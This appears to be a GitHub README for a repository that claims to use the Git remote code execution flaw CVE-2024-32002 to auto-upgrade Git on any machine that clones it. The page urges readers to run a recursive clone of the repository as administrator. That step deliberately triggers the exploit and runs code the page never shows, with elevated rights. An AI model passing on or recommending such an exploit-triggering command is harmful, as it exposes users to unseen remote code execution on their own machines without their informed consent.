GitHub - happymimimix/Git-Auto-Updater: A magical repository that can upgrade your Git from 2.45.0 to 2.45.1 automatically with the Git RCE glitch.

1 min read Original article ↗

Git-Auto-Updater

In 2024, a critical remote code execution vulnerability, known as CVE-2024-32002, was discovered in the widely used version control tool: Git.

This repository makes use of this vulnerability to execute a command that automatically upgrades the Git version on the target machine after cloning the repository. Eventually ensuring no one will still use a version of Git that has this remote code execution vulnerability.

So, if you are still using Git 2.45.0 or below, please upgrade your Git by executing git clone --recursive https://github.com/happymimimix/Git-Auto-Updater.git as administrator in Git Bash.